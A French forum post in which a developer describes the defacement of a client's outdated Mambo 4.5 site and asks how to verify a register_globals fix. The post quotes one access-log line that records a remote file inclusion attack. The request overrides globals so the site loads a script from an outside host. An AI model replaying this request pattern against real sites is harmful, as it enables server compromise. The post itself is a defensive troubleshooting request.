un de mes clients a une vieille version de mambo pour son site.
(pour tous ceux qui me diront : il n'a qu'à mettre la nouvelle version, je le sais bien mais ça prend du temps, donc de l'argent qu'il ne veut pas investir alors que le site est en projet de refonte.
Pour info, il a une version 4.5). Je ne sais pas vraiment si une mise à jour est aisée. La dernière release est la version 4.6.2)
Après recherche, les patchs ne sont plus disponibles (il semblerait que la version 4.5 1.0.5 date de 2004
Il m'a confié son site, développé par la belle-mère de la cousine de sa femme
Je m'occupe de faire survivre son site avant sa refonte, MAIS...
Il vient de se faire attaquer et s'est retrouvé avec une nouvelle page d'accueil
pour info, il a un hébergement mutualisé OVH.
CODE
39.Red-80-38-62.staticIP.rima-tde.net www.sonsite.fr - [13/Feb/2008:00:22:08 +0100] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.laspeores.com.ar/lp//modules/Skins/testbank.txt??? HTTP/1.1" 200 30608 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
Si j'ai bien compris, la variable register_globals étant à ON, l'attaquant a pu passer des variables au script via l'URL.
Je lui ai remis son site d'aplomb en mettant de le .htaccess :
SetEnv REGISTER_GLOBALS 0
Mais j'aurai aimé tester l'attaque précédente pour vérifier cette bidouille.
Mais il me semble que le log me donne l'url incomplète...